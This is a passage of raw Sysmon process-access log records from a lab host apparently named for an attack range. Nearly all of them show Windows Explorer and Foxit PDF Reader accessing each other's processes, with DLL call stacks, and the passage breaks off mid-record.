Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005752C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005752C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005752C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.386{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\windows.storage.dll+3c8b3e|C:\Windows\System32\windows.storage.dll+3cab0e|C:\Windows\System32\windows.storage.dll+125c93|C:\Windows\System32\windows.storage.dll+127079|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.386{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\windows.storage.dll+3c8b3e|C:\Windows\System32\windows.storage.dll+3cab0e|C:\Windows\System32\windows.storage.dll+125c93|C:\Windows\System32\windows.storage.dll+127079|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.386{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\windows.storage.dll+3c8b3e|C:\Windows\System32\windows.storage.dll+3cab0e|C:\Windows\System32\windows.storage.dll+125c93|C:\Windows\System32\windows.storage.dll+127079|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.386{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\windows.storage.dll+3cbc7e|C:\Windows\System32\windows.storage.dll+3c796f|C:\Windows\System32\windows.storage.dll+3c8ab0|C:\Windows\System32\windows.storage.dll+3cab0e|C:\Windows\System32\windows.storage.dll+125c93|C:\Windows\System32\windows.storage.dll+127079|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.386{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\shcore.dll+3db72(wow64)|C:\Windows\System32\windows.storage.dll+cd272(wow64)|C:\Windows\System32\windows.storage.dll+ccfb8(wow64)|C:\Windows\System32\windows.storage.dll+cd6f2(wow64)|C:\Windows\System32\COMDLG32.dll+189f6(wow64)|C:\Windows\System32\COMDLG32.dll+1879d(wow64)|C:\Windows\System32\COMDLG32.dll+1d816(wow64)|C:\Windows\System32\COMDLG32.dll+1b519(wow64)|C:\Windows\System32\COMDLG32.dll+26b78(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64) 10341000x800000000000000040577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.386{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF 